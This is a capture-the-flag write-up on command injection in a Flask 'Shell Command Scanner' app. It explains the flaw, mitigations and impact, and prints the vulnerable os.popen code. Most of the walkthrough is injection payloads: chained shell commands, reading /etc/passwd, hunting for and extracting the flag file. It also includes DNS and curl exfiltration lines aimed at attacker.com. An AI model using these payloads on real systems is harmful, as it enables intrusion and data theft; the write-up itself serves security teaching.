Command injection is a critical security vulnerability that occurs when applications execute operating system commands using user-controlled data without proper sanitization. This Shell Command Scanner challenge demonstrates how seemingly secure applications with dropdown menus can still be vulnerable to command injection through parameter manipulation and shell metacharacter exploitation.

1. Access the application: Navigate to http://<target-ip> to access the Shell Command Scanner
2. Explore the interface: The application presents a dropdown menu with pre-approved diagnostic commands
3. Test normal functionality: Try executing the provided commands to understand how the application works
4. Analyze the requests: Use browser developer tools or a proxy like Burp Suite to examine HTTP requests

# Available commands include:
- whoami (Get current user)
- date (Show current date/time)
- ps aux (List running processes)
- df -h (Show disk usage)
- netstat -tuln (Show network connections)

5. Identify the vulnerability pattern: Notice that the application likely executes shell commands directly

1. Parameter manipulation: Test if you can modify the command parameter directly
2. Shell metacharacter testing: Try injecting various command separators and special characters

# Command separator techniques:
; (command separator)
&& (AND operator)
|| (OR operator)
| (pipe operator)
` (backticks for command substitution)
$() (command substitution)
& (background execution)

3. Test basic injection: Try modifying a legitimate command with separators

# Basic injection tests (modify the POST data):
command=whoami; id
command=whoami && ls -la
command=whoami || cat /etc/passwd
command=whoami | head -5
command=`id`
command=$(whoami)

1. Confirm command injection: Verify that additional commands are being executed

# Test for successful injection:
POST /execute HTTP/1.1
Content-Type: application/x-www-form-urlencoded

command=whoami; echo "INJECTION_SUCCESS"

2. File system exploration: Use injected commands to explore the server's file system

# File system enumeration:
command=whoami; ls -la /
command=whoami; ls -la /opt
command=whoami; find / -name "*flag*" 2>/dev/null
command=whoami; find /opt -type f -name "*.txt" 2>/dev/null
command=whoami; ls -la /opt/security/
command=whoami; ls -la /opt/security/audit/

3. Advanced enumeration: Search for the flag file location systematically

# Deep directory search:
command=whoami; find /opt -type f -exec grep -l "[a-f0-9]\{8\}-[a-f0-9]\{4\}-[a-f0-9]\{4\}-[a-f0-9]\{4\}-[a-f0-9]\{12\}" {} \; 2>/dev/null
command=whoami; find /opt/security/audit/reports/2024/q3/july/weekly/system_scans/vulnerability_assessments/penetration_testing/results/ -name "*.txt" 2>/dev/null

1. Locate the flag file: The flag is stored in a deep directory structure within /opt/security/

# Navigate to the flag location:
command=whoami; ls -la /opt/security/audit/reports/2024/q3/july/weekly/system_scans/vulnerability_assessments/penetration_testing/results/

2. Read the flag file: Extract the flag using command injection

# Extract the flag:
command=whoami; cat /opt/security/audit/reports/2024/q3/july/weekly/system_scans/vulnerability_assessments/penetration_testing/results/flag.txt

Method 1: Using Backticks for Command Substitution

# Backtick injection:
command=`cat /opt/security/audit/reports/2024/q3/july/weekly/system_scans/vulnerability_assessments/penetration_testing/results/flag.txt`

Method 2: Using $() Command Substitution

# Dollar parentheses injection:
command=$(cat /opt/security/audit/reports/2024/q3/july/weekly/system_scans/vulnerability_assessments/penetration_testing/results/flag.txt)

Method 3: Using Pipe for Output Redirection

# Pipe injection to extract flag:
command=whoami | cat /opt/security/audit/reports/2024/q3/july/weekly/system_scans/vulnerability_assessments/penetration_testing/results/flag.txt

Method 4: Using && for Conditional Execution

# AND operator injection:
command=whoami && cat /opt/security/audit/reports/2024/q3/july/weekly/system_scans/vulnerability_assessments/penetration_testing/results/flag.txt

The vulnerable code in the Flask application:

# VULNERABLE: Direct command execution without sanitization
@app.route('/execute', methods=['POST'])
def execute_command():
    command = request.form.get('command', '')
    
    # Minimal validation - easily bypassed
    if not command or command not in ALLOWED_COMMANDS:
        return jsonify({'error': 'Invalid command'})
    
    # CRITICAL FLAW: Direct execution with os.popen()
    result = os.popen(command).read()
    return jsonify({'output': result})

The vulnerability exists because:

• Client-side validation only: The dropdown validation can be bypassed by manipulating HTTP requests
• No input sanitization: The application doesn't filter shell metacharacters
• Direct command execution: Uses os.popen() without safe parameter handling
• No command isolation: Allows command chaining through shell operators

• Input validation: Implement strict server-side whitelist validation for all user inputs
• Parameterized execution: Use subprocess.run() with shell=False and proper argument lists
• Command sanitization: Filter or escape shell metacharacters (;, &, |, `, $, etc.)
• Principle of least privilege: Run applications with minimal system permissions
• Avoid dynamic command construction: Use predefined command templates instead of string concatenation
• Security controls: Implement application firewalls and runtime protection

• Complete system compromise: Full control over the target server and its resources
• Data exfiltration: Access to sensitive files, databases, and confidential information
• Lateral movement: Using compromised systems to attack internal network infrastructure
• Service disruption: Ability to crash services, delete files, or modify system configurations
• Malware deployment: Installing backdoors, rootkits, or other malicious software
• Compliance violations: Regulatory breaches due to unauthorized system access and data exposure

Time-based Command Injection

# Use sleep to confirm injection when output is not visible:
command=whoami; sleep 5
command=whoami && sleep 10

Blind Command Injection with DNS Exfiltration

# Exfiltrate data via DNS queries (replace with your domain):
command=whoami; nslookup $(cat /opt/security/audit/reports/2024/q3/july/weekly/system_scans/vulnerability_assessments/penetration_testing/results/flag.txt | tr -d '-').attacker.com

HTTP Exfiltration

# Send flag data to external server:
command=whoami; curl -X POST -d "flag=$(cat /opt/security/audit/reports/2024/q3/july/weekly/system_scans/vulnerability_assessments/penetration_testing/results/flag.txt)" http://attacker.com/receive

• Burp Suite: Professional web application security testing platform with request manipulation
• OWASP ZAP: Free security testing proxy with automated command injection detection
• Commix: Specialized automated tool for detecting and exploiting command injection vulnerabilities
• Manual testing: Custom payloads and techniques for specific application contexts
• cURL: Command-line tool for crafting custom HTTP requests with injection payloads

This Shell Command Scanner challenge demonstrates critical command injection vulnerabilities in web applications that execute system commands based on user input. The challenge shows how dropdown menus and client-side validation provide false security, as attackers can bypass these controls through HTTP request manipulation. By exploiting command separators and shell metacharacters, attackers can execute arbitrary commands, explore file systems, and extract sensitive data. This scenario emphasizes the importance of server-side validation, input sanitization, and secure command execution practices in enterprise applications.